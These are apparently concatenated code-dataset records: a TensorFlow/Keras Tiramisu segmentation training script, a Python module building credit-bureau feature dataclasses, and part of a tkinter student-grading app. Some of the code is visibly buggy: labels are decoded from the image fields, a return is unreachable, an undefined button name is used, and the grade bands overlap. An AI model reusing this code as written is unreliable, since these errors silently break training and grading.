_bytes_feature(tf.compat.as_bytes(label.tostring())),\r\n# 'test/image': _bytes_feature(tf.compat.as_bytes(img.tostring()))}\r\n# # Create an example protocol buffer\r\n# example = tf.train.Example(features=tf.train.Features(feature=feature))\r\n# # Serialize to string and write on the file\r\n# writer.write(example.SerializeToString())\r\n# writer.close()\r\n# sys.stdout.flush()\r\n\r\n\r\n\r\n# # ############################################ pre-defining layers #################################################\r\n# ####################################################################################################################\r\n# ####################################################################################################################\r\n#\r\ndef relu(x): return Activation('relu')(x)\r\ndef dropout(x, p): return Dropout(p)(x) if p else x\r\ndef bn(x): return BatchNormalization(axis=-1)(x)\r\ndef relu_bn(x): return relu(bn(x))\r\ndef concat(xs): return concatenate(xs, axis=-1)\r\ndef conv(x, nf, sz, wd, p, stride=1):\r\n x = Conv2D(nf, 3, strides=(1, 1), padding='same', kernel_initializer='he_uniform', kernel_regularizer=l2(wd))(x)\r\n return 
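The commented-out writer above serializes each image/label pair as raw bytes under the train/image and train/label keys that parse_train later expects. A minimal sketch in the same TF1-era API the script targets (tf.python_io.TFRecordWriter); the output path is a placeholder, and .tobytes() is the newer spelling of the script's .tostring():

import numpy as np
import tensorflow as tf

def _bytes_feature(value):
    return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))

img = np.zeros((224, 224, 3), dtype=np.float32)
lbl = np.zeros((224, 224, 1), dtype=np.float32)

with tf.python_io.TFRecordWriter("/tmp/demo.tfrecords") as writer:
    feature = {
        "train/image": _bytes_feature(tf.compat.as_bytes(img.tobytes())),
        "train/label": _bytes_feature(tf.compat.as_bytes(lbl.tobytes())),
    }
    example = tf.train.Example(features=tf.train.Features(feature=feature))
    writer.write(example.SerializeToString())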
dropout(x, p)\r\ndef conv_relu_bn(x, nf, sz=3, wd=0, p=0, stride=1):\r\n return conv(relu_bn(x), nf, sz, wd=wd, p=p, stride=stride)\r\ndef dense_block(n,x,growth_rate,p,wd):\r\n added = []\r\n for i in range(n):\r\n b = conv_relu_bn(x, growth_rate, p=p, wd=wd)\r\n x = concat([x, b])\r\n added.append(b)\r\n return x,added\r\ndef transition_dn(x, p, wd):\r\n x = conv_relu_bn(x, x.get_shape().as_list()[-1], sz=1, p=p, wd=wd)\r\n return MaxPooling2D(strides=(2, 2))(x)\r\n return conv_relu_bn(x, x.get_shape().as_list()[-1], sz=1, p=p, wd=wd, stride=2)\r\ndef down_path(x, nb_layers, growth_rate, p, wd):\r\n skips = []\r\n for i,n in enumerate(nb_layers):\r\n x,added = dense_block(n,x,growth_rate,p,wd)\r\n skips.append(x)\r\n x = transition_dn(x, p=p, wd=wd)\r\n return skips, added\r\ndef transition_up(added, wd=0):\r\n x = concat(added)\r\n _, r, c, ch = x.get_shape().as_list()\r\n return Conv2DTranspose(ch, 3, strides=(2, 2), kernel_initializer='he_uniform',\r\n padding='same', kernel_regularizer=l2(wd))(x)\r\ndef up_path(added, skips, nb_layers, growth_rate, p, wd):\r\n for i,n in enumerate(nb_layers):\r\n x = transition_up(added, wd)\r\n x = concat([x,skips[i]])\r\n x,added = dense_block(n,x,growth_rate,p,wd)\r\n return x\r\ndef reverse(a): return list(reversed(a))\r\n\r\n\r\ndef format_image(data, size=(224, 224, 3)):\r\n data_out = tf.image.per_image_standardization(tf.image.decode_jpeg(data, channels=3))\r\n data_out.set_shape(size)\r\n data_cast = tf.cast(data_out, dtype=tf.float32)\r\n return data_cast\r\n\r\n\r\ndef format_label(data, size=(224, 224, 1)):\r\n data_out = tf.image.per_image_standardization(tf.image.decode_jpeg(data, channels=1))\r\n data_out.set_shape(size)\r\n data_cast = tf.cast(data_out, dtype=tf.float32)\r\n return data_cast\r\n\r\n\r\nfeatures_spec={\r\n 'train/label': tf.FixedLenFeature([], tf.string),\r\n 'train/image': tf.FixedLenFeature([], tf.string),\r\n 'test/label': tf.FixedLenFeature([], tf.string),\r\n 'test/image': tf.FixedLenFeature([], tf.string)\r\n}\r\n\r\n\r\ndef parse_train(serialized):\r\n features = tf.parse_single_example(serialized, features_spec)\r\n\r\n image = format_image(features['train/image'])\r\n label = format_label(features['train/label'])\r\n\r\n return image, label\r\n\r\ndef parse_validation(serialized):\r\n features = tf.parse_single_example(serialized, features_spec)\r\n\r\n image = format_image(features['test/image'])\r\n label = format_label(features['test/label'])\r\n\r\n return image, label\r\n#\r\n# # ########################################### Creating the Tiramisu #################################################\r\n# #####################################################################################################################\r\n# #####################################################################################################################\r\n#\r\ndef create_tiramisu(nb_classes, img_input, nb_dense_block=6, growth_rate=16, nb_filter=48, nb_layers_per_block=5, p=None, wd=0):\r\n\r\n if type(nb_layers_per_block) is list or type(nb_layers_per_block) is tuple:\r\n nb_layers = list(nb_layers_per_block)\r\n else:\r\n nb_layers = [nb_layers_per_block] * nb_dense_block\r\n\r\n # ################### a set of layers for the Tiramisu model #######################\r\n x = conv(img_input, nb_filter, 3, wd, 0)\r\n skips, added = down_path(x, nb_layers, growth_rate, p, wd)\r\n\r\n x = up_path(added, reverse(skips[:-1]), reverse(nb_layers[:-1]), growth_rate, p, wd)\r\n\r\n x = conv(x, nb_classes, 1, wd, 0)\r\n _, r, c, f = 
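dense_block above is the DenseNet idea behind the Tiramisu: each layer's output is concatenated back onto its input, so the channel count grows by growth_rate per layer while `added` collects only the new slices. A shape-only numpy sketch of that growth:

import numpy as np

x = np.zeros((1, 8, 8, 48))                # stand-in feature map, 48 channels
for _ in range(4):                         # n = 4 layers, growth_rate = 16
    b = np.zeros(x.shape[:-1] + (16,))     # what conv_relu_bn would emit
    x = np.concatenate([x, b], axis=-1)    # concat([x, b]) in dense_block
print(x.shape)                             # (1, 8, 8, 112) == 48 + 4 * 16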
x.get_shape().as_list()\r\n x = Reshape((-1, nb_classes))(x)\r\n return Activation('softmax')(x)\r\n#\r\n#\r\n# # ####################################### Defining input/output #####################################################\r\n# #####################################################################################################################\r\n# #####################################################################################################################\r\n# Train_dataset = tf.data.TFRecordDataset(TFRecord_train)\r\n# Train_dataset = Train_dataset.map(parse_train)\r\n# Train_dataset = Train_dataset.shuffle(buffer_size=1024)\r\n# Train_dataset = Train_dataset.repeat(None)\r\n# Train_dataset = Train_dataset.batch(32)\r\n#\r\n#\r\n# Validation_dataset = tf.data.TFRecordDataset(TFRecord_validation)\r\n# Validation_dataset = Validation_dataset.map(parse_validation)\r\n# Validation_dataset = Validation_dataset.batch(32).repeat()\r\nTFRecord_train = '/Volumes/Segate 3TB/segmentation_data/AI_background_train.tfrecords'\r\nTFRecord_validation = '/Volumes/Segate 3TB/segmentation_data/AI_background_test.tfrecords'\r\n\r\ntrain_feature = {'train/image': tf.FixedLenFeature([], tf.string),\r\n 'train/label': tf.FixedLenFeature([], tf.string)}\r\n\r\ntest_feature = {'test/image': tf.FixedLenFeature([], tf.string),\r\n 'test/label': tf.FixedLenFeature([], tf.string)}\r\n\r\n\r\ndef input_fn_train(filenames, train, buffer_size=1024):\r\n dataset = tf.data.TFRecordDataset(filenames=filenames)\r\n dataset = dataset.map(parse_train)\r\n dataset = dataset.shuffle(buffer_size=buffer_size)\r\n dataset = dataset.repeat(None)\r\n dataset = dataset.batch(32)\r\n return dataset\r\ndef input_fn_val(filenames, train, buffer_size=1024):\r\n dataset = tf.data.TFRecordDataset(filenames=filenames)\r\n dataset = dataset.map(parse_validation)\r\n dataset = dataset.shuffle(buffer_size=buffer_size)\r\n dataset = dataset.repeat(None)\r\n dataset = dataset.batch(32)\r\n return dataset\r\n\r\ndef train_input_fn():\r\n TFRecord_train = '/Volumes/Segate 3TB/segmentation_data/AI_background_train.tfrecords'\r\n return input_fn_train(filenames=TFRecord_train, train=True)\r\ndef validation_input_fn():\r\n TFRecord_validation = '/Volumes/Segate 3TB/segmentation_data/AI_background_test.tfrecords'\r\n return input_fn_val(filenames=TFRecord_validation, train=True)\r\ndef read_decode(train_data_path, test_data_path, train_feature, test_feature):\r\n # Create a list of file names and pass it to a queue\r\n train_filename_queue = tf.train.string_input_producer([train_data_path], num_epochs=1)\r\n test_filename_queue = tf.train.string_input_producer([test_data_path], num_epochs=1)\r\n\r\n # Define a reader and read the next record\r\n train_reader = tf.TFRecordReader()\r\n _, train_serialized_example = train_reader.read(train_filename_queue)\r\n test_reader = tf.TFRecordReader()\r\n _, test_serialized_example = test_reader.read(test_filename_queue)\r\n\r\n # Decode the record read by the reader\r\n train_features = tf.parse_single_example(train_serialized_example, features=train_feature)\r\n test_features = tf.parse_single_example(test_serialized_example, features=test_feature)\r\n\r\n # Convert the image data from string back to the numbers\r\n # Cast label data into int32\r\n # Reshape image data into the original shape\r\n train_image = tf.decode_raw(train_features['train/image'], tf.float32)\r\n train_label = tf.decode_raw(train_features['train/image'], tf.float32)\r\n\r\n train_image = tf.reshape(train_image, [224, 224, 
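The input functions above follow the usual tf.data recipe: read TFRecords, map a parser, shuffle within a bounded buffer, repeat indefinitely, and batch. A condensed sketch of that pipeline, with the parser passed in as a parameter rather than hard-coded:

import tensorflow as tf

def make_dataset(filenames, parse_fn, batch_size=32, buffer_size=1024):
    ds = tf.data.TFRecordDataset(filenames=filenames)
    ds = ds.map(parse_fn)            # decode + standardize each example
    ds = ds.shuffle(buffer_size)     # randomize within a bounded buffer
    ds = ds.repeat(None)             # loop forever; the trainer decides steps
    return ds.batch(batch_size)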
3])\r\n train_label = tf.reshape(train_label, [224, 224, 1])\r\n\r\n print('train image', train_image)\r\n print('train_label', train_label)\r\n\r\n test_image = tf.decode_raw(test_features['test/image'], tf.float32)\r\n test_label = tf.decode_raw(test_features['test/image'], tf.float32)\r\n\r\n test_image = tf.reshape(test_image, [224, 224, 3])\r\n test_label = tf.reshape(test_label, [224, 224, 1])\r\n\r\n print('test_image', test_image)\r\n print('test_label', test_label)\r\n\r\n # Creates batches by randomly shuffling tensors\r\n train_images, train_labels = tf.train.shuffle_batch([train_image, train_label], batch_size=32, capacity=30,\r\n num_threads=1, min_after_dequeue=10)\r\n test_images, test_labels = tf.train.shuffle_batch([test_image, test_label], batch_size=32, capacity=30,\r\n num_threads=1, min_after_dequeue=10)\r\n\r\n return train_images, train_labels, test_images, test_labels\r\n\r\n\r\ntrain_images, train_labels, test_images, test_labels = read_decode(TFRecord_train, TFRecord_validation, train_feature, test_feature)\r\n# Train_dataset = train_input_fn()\r\n# Validation_dataset = validation_input_fn()\r\n\r\n\r\ninput_shape = (224, 224, 3)\r\nimg_input = Input(shape=input_shape)\r\nx = create_tiramisu(2, img_input, nb_layers_per_block=[4, 5, 7, 10, 12, 15], p=0.2, wd=1e-4)\r\n\r\n\r\n# ################################################## Model ########################################################\r\nwith tf.Session() as sess:\r\n\r\n # Initialize all global and local variables\r\n init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\r\n sess.run(init_op)\r\n\r\n # Create a coordinator and run all QueueRunner objects\r\n coord = tf.train.Coordinator()\r\n threads = tf.train.start_queue_runners(coord=coord)\r\n\r\n # Train set\r\n train_img, train_lbl = sess.run([train_images, train_labels])\r\n train_img = train_img.astype(np.uint8)\r\n train_lbl = train_lbl.astype(np.uint8)\r\n\r\n # Test set\r\n test_img, test_lbl = sess.run([test_images, test_labels])\r\n test_img = test_img.astype(np.uint8)\r\n test_lbl = test_lbl.astype(np.uint8)\r\n\r\n model = Model(img_input, x)\r\n\r\n\r\n # # Configuring the model for trainging\r\n model.compile(loss='sparse_categorical_crossentropy', optimizer=keras.optimizers.RMSprop(1e-3), metrics=[\"accuracy\"])\r\n model.optimizer = keras.optimizers.RMSprop(1e-3, decay=1-0.99995)\r\n model.optimizer = keras.optimizers.RMSprop(1e-3)\r\n K.set_value(model.optimizer.lr, 1e-3)\r\n model.fit(train_img, train_lbl, batch_size=None, epochs=100)\r\n\r\n# validation_data=np.array(Validation_dataset)\r\n# model.optimizer = keras.optimizers.RMSprop(3e-4, decay=1-0.9995)\r\n# model.fit_generator(gen, rnd_trn, 500, verbose=2, validation_data=gen_test, nb_val_samples=rnd_test)\r\n # Stop the threads\r\n coord.request_stop()\r\n\r\n # Wait for threads to stop\r\n coord.join(threads)\r\n sess.close()\r\n\r\n","sub_path":"Tiramisu_segmentation.py","file_name":"Tiramisu_segmentation.py","file_ext":"py","file_size_in_byte":20048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"475341923","text":"from dataclasses import dataclass, field, make_dataclass\nfrom typing import List, Any\n\nfrom campo.models import Campo, CampoAgregado\n\nreplaces = [\n # originacion\n \"avg_cred_max_nbk_tu_cl_acc\",\n \"avg_max_mop_bal_nbk_tu_op_acc\",\n \"num_max_mop_bal_nbk_tu_op_acc\",\n \"num_num_dlq_bal_nbk_tu_cl_acc\",\n # ingresos\n]\n\n\n@dataclass\nclass FeaturesBuro:\n features: 
List[str]\n campos: List[CampoAgregado] = field(init=False)\n\n # types\n subvariables_cuentas: type = field(init=False) # container class\n subvariables_vector_cuentas: type = field(init=False) # container class\n variables_cuentas: type = field(init=False) # container class\n\n subvariables_consultas: type = field(init=False) # container class\n variables_consultas: type = field(init=False) # container class\n\n subvariables_score: type = field(init=False) # container class\n variables_score: type = field(init=False) # container class\n\n def __post_init__(self):\n self.campos = self.construye_campos()\n self.configura_features_consultas()\n self.configura_features_score()\n self.configura_features_cuentas()\n\n def configura_features_consultas(self):\n self.subvariables_consultas = make_dataclass(\n 'SubVariablesConsultas',\n [(campo.nombre, float, None) for campo in self.subcampos_consultas]\n )\n\n self.variables_consultas = make_dataclass(\n 'VariablesConsultas',\n [(campo.nombre, float, None) for campo in self.campos_consultas]\n )\n\n def configura_features_score(self):\n self.subvariables_score = make_dataclass(\n 'SubVariablesScore',\n [(campo.nombre, float, None) for campo in self.subcampos_score]\n )\n\n self.variables_score = make_dataclass(\n 'VariablesScore',\n [(campo.nombre, float, None) for campo in self.campos_score]\n )\n\n def configura_features_cuentas(self):\n self.subvariables_cuentas = make_dataclass(\n 'SubVariablesCuentas',\n [(campo.nombre, float, None) for campo in self.subcampos_cuentas]\n )\n\n self.subvariables_vector_cuentas = make_dataclass(\n 'SubVariablesVectorCuentas',\n [(campo.nombre, float, None) for campo in self.subcampos_vector_cuentas]\n )\n\n self.variables_cuentas = make_dataclass(\n 'VariablesCuentas',\n [(campo.nombre, float, None) for campo in self.campos_cuentas]\n )\n\n def construye_campos(self):\n for i in range(0, len(self.features)):\n for rep in replaces:\n if self.features[i] == rep:\n self.features[i] = rep.replace('_tu', '')\n _campos = {}\n with open('caracteristicas/varmap.csv') as varmap_file:\n for line in varmap_file:\n line_split = line.strip('\\n').split('|')\n for feature in self.features:\n if line_split[0] == feature:\n try:\n field_split = line_split[1].split(',')\n subfield_split = field_split[2].split('-')\n if len(subfield_split) > 1:\n field_split[2] = CampoAgregado(*subfield_split)\n if field_split[-1] == '':\n field_split[-1] = None\n _campos[feature] = CampoAgregado(*field_split)\n except TypeError as e:\n print(e)\n raise e\n\n return [_campos[feature] for feature in self.features]\n\n @property\n def campos_score(self):\n return tuple(filter(lambda x: x.segmento == 'score', self.campos))\n\n @property\n def campos_cuentas(self):\n return tuple(filter(lambda x: x.segmento == 'cuentas', self.campos))\n\n @property\n def campos_consultas(self):\n return tuple(filter(lambda x: x.segmento == 'consultas', self.campos))\n\n @property\n def subcampos_cuentas(self):\n subcampos = set(map(\n lambda x: x.campo,\n filter(lambda x: not isinstance(x.campo, CampoAgregado), self.campos_cuentas)\n ))\n ret = set([])\n while subcampos:\n subcampo = subcampos.pop()\n if subcampo.variable == 'mop':\n ret.add(Campo('cuentas', 't_mop', subcampo.sufijo))\n ret.add(Campo('cuentas', 'peso_mop', subcampo.sufijo))\n else:\n ret.add(subcampo)\n return ret\n\n @property\n def subcampos_vector_cuentas(self):\n return set(map(\n lambda x: x.campo,\n filter(lambda x: getattr(x.campo, 'segmento', None) == 'ingreso', self.campos_cuentas)\n 
))\n\n @property\n def subcampos_consultas(self):\n return set(map(lambda x: x.campo, self.campos_consultas))\n\n @property\n def subcampos_score(self):\n return set(map(lambda x: x.campo, self.campos_score))\n","sub_path":"caracteristicas/buro.py","file_name":"buro.py","file_ext":"py","file_size_in_byte":5010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"5668933","text":"from tkinter import *\r\nimport sys\r\nimport time;\r\nimport random\r\nimport datetime\r\nimport os\r\nfrom PIL import ImageTk,Image\r\nfrom tkinter import messagebox\r\nimport re\r\nfrom tkinter import ttk\r\nimport tkinter.messagebox\r\n\r\n#set theme=[waldorf $: : argv 0]\r\n\r\ndef okp():\r\n RegCP.destroy()\r\n Window1()\r\n\r\ndef confirmPN():\r\n global RegCP\r\n usernamei=username.get()\r\n list_of_files=os.listdir('C:/Users/codei/Documents/ndaca')\r\n data = open(usernamei,\"r\")\r\n data1=data.read()\r\n RegCP=Toplevel()\r\n RegCP.title(\"recover password page\")\r\n RegCP.iconbitmap(\"favico.ico\")\r\n RegCP.resizable(width=False, height=False)\r\n RegCP.config(bg=\"brown\")\r\n labelCPt=Label(RegCP, text=\"this is your details\",bg=\"brown\")\r\n labelCPt.pack()\r\n labelCP=Label(RegCP, text=data1,bg=\"brown\")\r\n labelCP.pack()\r\n pas=LabelFrame(RegCP,bg=\"brown\")\r\n BtnCP=Button(pas, text=\"ok\", command=Window1,bg=\"brown\")\r\n \r\n btnCp.pack()\r\n data.close()\r\n RegCP.mainloop()\r\n\r\ndef forgetpass():\r\n global username\r\n username=StringVar()\r\n Reg1=Toplevel()\r\n Reg1.title(\"recover password page\")\r\n Reg1.iconbitmap(\"favico.ico\")\r\n Reg1.resizable(width=False, height=False)\r\n Reg1.config(bg=\"brown\")\r\n\r\n frame12=Frame(Reg1, bg =\"#BFBFBF\", relief=FLAT)\r\n frame12.pack()\r\n frameFP=LabelFrame(frame12,bg =\"white\", relief=RIDGE, bd=3)\r\n frameFP.pack()\r\n labelf=Label(frameFP, justify=LEFT,width=27, text=\"please confirm\" + \"\\n\" + \"username\" + \"\\n\" + \r\n \"by entering your number below\", bg='#BFBFBF',\r\n font=(\"Arial Rounded MT Bold\",13))\r\n labelf.pack()\r\n\r\n logo2 = ImageTk.PhotoImage(Image.open(\"qm.jpg\"))\r\n\r\n\r\n\r\n fp=Label(frame12, image=logo2)\r\n fp.pack()\r\n\r\n #\r\n #labelf=Label(frame12, justify=LEFT, text=\"please confirm\" + \"\\n\" + \"your phone number\" + \"\\n\" + \r\n #\"by entering your number below\", bg='#BFBFBF',\r\n #font=(\"Arial Rounded MT Bold\",8))\r\n #labelf.place(x=7,y=7)\r\n frameFQ=LabelFrame(frame12,bg =\"#BFBFBF\", relief=RIDGE, bd=3)\r\n frameFQ.pack()\r\n\r\n FNlabelw=Label(frameFQ,width=42, text=\"username*\", bg='#BFBFBF',font=(\"Arial Rounded MT Bold\",8),pady=10)\r\n FNlabelw.pack()\r\n FNentryw =Entry(frameFQ, relief= RIDGE,width=30,bd=1,bg =\"white\", show=\"*\", justify= CENTER, textvariable=username)\r\n FNentryw.pack(ipady=8) \r\n bitt2=Button(frameFQ,width=20, text=\"submit\",bg =\"#BFBFBF\", relief=FLAT,command=confirmPN)\r\n bitt2.pack()\r\n Reg1.mainloop()\r\n\r\ndef rad3(value):\r\n if r==1:\r\n Window4()\r\n else:\r\n Window3() \r\ndef cancel():\r\n global cancel\r\n response=messagebox.askokcancel()\r\n#def slide(var):\r\n # txtdisplay.configure(height=horiz.get(), width=vert.get())\r\n\r\n\r\n\r\n\r\ndef button_click(number):\r\n #caE.delete(0, END)\r\n current = caE.get()\r\n caE.delete(0, END)\r\n caE.insert(0, str(current) + str(number))\r\ndef button_equals():\r\n second_number=caE.get()\r\n caE.delete(0, END)\r\n try:\r\n if smath==\"addition\":\r\n result =f_num + int(second_number)\r\n caE.insert(0, result)\r\n if 
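FeaturesBuro above builds its container types at runtime with make_dataclass, one (name, type, default) tuple per campo. A standalone sketch of the same pattern; the field names here are invented stand-ins for campo.nombre:

from dataclasses import make_dataclass

nombres = ["num_consultas_6m", "score_bc"]       # stand-ins for campo.nombre
VariablesConsultas = make_dataclass(
    "VariablesConsultas",
    [(n, float, None) for n in nombres],         # every field defaults to None
)

v = VariablesConsultas(num_consultas_6m=3.0)
print(v)   # VariablesConsultas(num_consultas_6m=3.0, score_bc=None)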
smath==\"divide\":\r\n result =f_num / int(second_number)\r\n caE.insert(0, result)\r\n if smath==\"multiply\":\r\n result = f_num * int(second_number)\r\n caE.insert(0,result)\r\n if smath==\"substraction\":\r\n result = f_num - int(second_number)\r\n caE.insert(0, result)\r\n except ValueError and NameError:\r\n caE.insert(0, \"syntax error\")\r\n\r\ndef checkca1():\r\n if var1.get()==1:\r\n ca1E.configure(state=NORMAL)\r\n ca1E.focus()\r\n ca1E.delete(0, END)\r\n elif var1.get()==0:\r\n ca1E.configure(state=DISABLED)\r\ndef checkca2():\r\n if var2.get()==1:\r\n ca2E.configure(state=NORMAL)\r\n ca2E.focus()\r\n ca2E.delete(0, END)\r\n elif var2.get()==0:\r\n ca2E.configure(state=DISABLED)\r\ndef checkca3():\r\n if var3.get()==1:\r\n ca3E.configure(state=NORMAL)\r\n ca3E.focus()\r\n ca3E.delete(0, END)\r\n elif var3.get()==0:\r\n ca3E.configure(state=DISABLED)\r\ndef checkca4():\r\n if var4.get()==1:\r\n ca4E.configure(state=NORMAL)\r\n ca4E.focus()\r\n ca4E.delete(0, END)\r\n elif var4.get()==0:\r\n ca4E.configure(state=DISABLED)\r\ndef checkca5():\r\n if var5.get()==1:\r\n ca5E.configure(state=NORMAL)\r\n ca5E.focus()\r\n ca5E.delete(0, END)\r\n elif var5.get()==0:\r\n ca5E.configure(state=DISABLED)\r\n\r\n\r\n\r\ndef button_add():\r\n first_number=caE.get()\r\n global f_num\r\n global smath\r\n smath=\"addition\"\r\n f_num = int(first_number)\r\n caE.delete(0, END)\r\ndef button_substract():\r\n first_number=caE.get()\r\n global f_num\r\n global smath\r\n smath=\"substraction\"\r\n f_num = int(first_number)\r\n caE.delete(0, END)\r\ndef button_multiply():\r\n first_number=caE.get()\r\n global f_num\r\n global smath\r\n smath=\"multiply\"\r\n f_num = int(first_number)\r\n caE.delete(0, END)\r\ndef button_divide():\r\n first_number=caE.get()\r\n global f_num\r\n global smath\r\n smath=\"divide\"\r\n f_num = int(first_number)\r\n caE.delete(0, END)\r\ndef button_clears():\r\n caE.delete(0, END)\r\n caE.insert(0, \"0\")\r\n\r\ndef reset():\r\n var1.set(0)\r\n var2.set(0)\r\n var3.set(0)\r\n var4.set(0)\r\n var5.set(0)\r\n ca11.set(\"0\")\r\n ca22.set(\"0\")\r\n ca33.set(\"0\")\r\n ca44.set(\"0\")\r\n ex1.set(\"0\")\r\n caE.delete(0, END)\r\n ca1E.configure(state=DISABLED)\r\n ca2E.configure(state=DISABLED)\r\n ca3E.configure(state=DISABLED)\r\n ca4E.configure(state=DISABLED)\r\n ca5E.configure(state=DISABLED)\r\n LBfn.delete(0, END)\r\n LBln.delete(0, END)\r\n #f_name.set(\"0\")\r\n #L_name.set(\"0\")\r\n #ca_ttl.set(\"0\")\r\n #exm_ttl.set(\"0\")\r\n #avg.set(\"0\")\r\n #cle_ttl.set(\"0\")\r\n pos2.current(0)\r\n term4.current(0)\r\n LBCT.delete(0, END)\r\n LBET.delete(0, END)\r\n LBCAT.delete(0, END)\r\n LBremark.delete(0,END)\r\n #txtdisplay.delete(1.0, END)\r\n #txtdisplay.insert(1.0, \"FIRST NAME\\t\\t\" + \"LAST NAME\\t\\t\\t\" + \"1st C.A\\t\\t\"+ \"2nd C.A\\t\\t\"+ \"3rd C.A\\t\\t\"+ \"4th C.A\\t\\t\"+ \"C.A total\\t\\t\"+ \"Exam total\\t\\t\"+ \"average\\t\\t\")\r\n\r\n\r\ndef finish():\r\n f_name1=f_name.get()\r\n L_name1=L_name.get()\r\n avge1=avge.get()\r\n tex1=(ca5E.get())\r\n tca44=(ca4E.get()) \r\n tca33=(ca3E.get())\r\n tca11=(ca1E.get())\r\n tca22=(ca2E.get())\r\n sub_n=subject_name.get()\r\n gd= LBET.get()\r\n txtdisplay.insert(1.0, \"\\n\\n\" + str(f_name1) + \"\\t\\t\" + str(L_name1) + \"\\t\\t\\t\" + str(tca11) + \"\\t\\t\" + str(tca22) + \"\\t\\t\" + \r\n str(tca33) + \"\\t\\t\" + str(tca44) + \"\\t\\t\\t\\t\" + str(tex1) + \"\\t\\t\" + str(total1) + \"\\t\\t\" + str(total2) + \"\\t\\t\" + str(gd) + \"\\t\\t\" +str(avge1))\r\n txtdisplay.insert(1.0, \"\\nFIRST 
NAME\\t\\t\" + \"LAST NAME\\t\\t\\t\" + \"1st C.A\\t\\t\"+ \"2nd C.A\\t\\t\"+ \"3rd C.A\\t\\t\"+ \"4th C.A\\t\\t\\t\\t\" + \"Examination\\t\\t\" + \"C.A total\\t\\t\" + \"total\\t\\t\"\r\n + \"grade\\t\\t\" + \"remark\\t\\t\" + \"\\n\")\r\n txtdisplay.insert(1.0, \"\\nSUBJECT :\" + str(sub_n) + \"\\n\")\r\n \r\n \r\n #txtdisplay.insert(1.0, + str(L_name1))\r\n #txtdisplay.insert(1.0, str(tca11) + \"\\t\\t\")\r\n #txtdisplay.insert(1.0, str(tca22) + \"\\t\\t\")\r\n #txtdisplay.insert(1.0, str(tca33) + \"\\t\\t\")\r\n #txtdisplay.insert(1.0, str(tca44) + \"\\t\\t\")\r\n #txtdisplay.insert(1.0, str(tex1) + \"\\t\\t\")\r\n #txtdisplay.insert(1.0, str(total1) + \"\\t\\t\")\r\n #txtdisplay.insert(1.0, str(total2) + \"\\t\\t\")\r\n #txtdisplay.insert(1.0, str(avge1))\r\n\r\ndef total():\r\n tca111=int(ca1E.get())\r\n tca222=int(ca2E.get())\r\n tca333=int(ca3E.get())\r\n tca444=int(ca4E.get())\r\n tex11=int(ca5E.get())\r\n tex1=(ca5E.get())\r\n tca44=(ca4E.get()) \r\n tca33=(ca3E.get())\r\n tca11=(ca1E.get())\r\n tca22=(ca2E.get())\r\n\r\n if re.search('[a-z]', tex1) and re.search('[A-Z]', tex1):\r\n response=messagebox.showerror(\"...\",\"input contains an alphabet\")\r\n ca5E.delete(0, END)\r\n if re.search('[a-z]', tca44) and re.search('[A-Z]', tca44):\r\n response=messagebox.showerror(\"...\",\"input contains an alphabet\")\r\n ca4E.delete(0, END)\r\n if re.search('[a-z]', tca33) and re.search('[A-Z]', tca33):\r\n response=messagebox.showerror(\"...\",\"input contains an alphabet\")\r\n ca3E.delete(0, END)\r\n if re.search('[a-z]', tca11) and re.search('[A-Z]', tca11):\r\n response=messagebox.showerror(\"...\",\"input contains an alphabet\")\r\n ca1E.delete(0, END)\r\n if re.search('[a-z]', tca22) and re.search('[A-Z]', tca22):\r\n response=messagebox.showerror(\"...\",\"input contains am alpha\")\r\n ca2E.delete(0, END)\r\n else:\r\n global total1\r\n total1=(tca444 + tca333 + tca222 + tca111)\r\n global total2\r\n total2= int(total1) + int(tex1)\r\n LBCT.insert(0, str(total1))\r\n #LBET.insert(0, str(tex1))\r\n LBCAT.insert(0, str(total2))\r\n #t1 = [74, 75,76,77,78,7,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,07,98,99,]\r\n\r\n #for total2 in range(74-100):\r\n # LBremark.insert(0, 'EXCELLENT')\r\n #else:\r\n # pass\r\n if total2 in list(range(74,101)):\r\n LBremark.insert(0, \" EXCELLENT\")\r\n elif total2 in list(range(69,75)):\r\n LBremark.insert(0, 'V.GOOD')\r\n elif total2 in list(range(64,70)):\r\n LBremark.insert(0, \"GOOD\")\r\n elif total2 in list(range(50,65)):\r\n LBremark.insert(0, 'CREDIT')\r\n elif total2 in list(range(39,50)):\r\n LBremark.insert(0,'PASS')\r\n elif total2 in list(range(17,40)):\r\n LBremark.insert(0, 'WEAK PASS')\r\n elif total2 < 17:\r\n LBremark.insert(0, 'FAIL')\r\n elif total2 > 100:\r\n response=messagebox.showinfo('OOPS', 'values dont correspond')\r\n else:\r\n response=messagebox.showinfo('OOPS', 'SCORE IS OVER')\r\n #avge.set(\"EXCELLENT\")\r\n\r\n\r\n\r\n\r\n if total2 in list(range(69,101)):\r\n LBET.insert(0, \"A1\")\r\n elif total2 in list(range(60,70)):\r\n LBET.insert(0, 'B2') \r\n elif total2 in list(range(60,65)):\r\n LBET.insert(0, \"B3\")\r\n elif total2 in list(range(54,60)):\r\n LBET.insert(0, 'C4')\r\n elif total2 in list(range(49,55)):\r\n LBET.insert(0,'C5')\r\n elif total2 in list(range(45,50)):\r\n LBET.insert(0, 'C6')\r\n elif total2 in list(range(39,45)):\r\n LBET.insert(0, 'D7')\r\n elif total2 in list(range(17,40)):\r\n LBET.insert(0, 'E8')\r\n elif total2 < 17:\r\n LBET.insert(0, 'F9')\r\n \r\n else:\r\n 
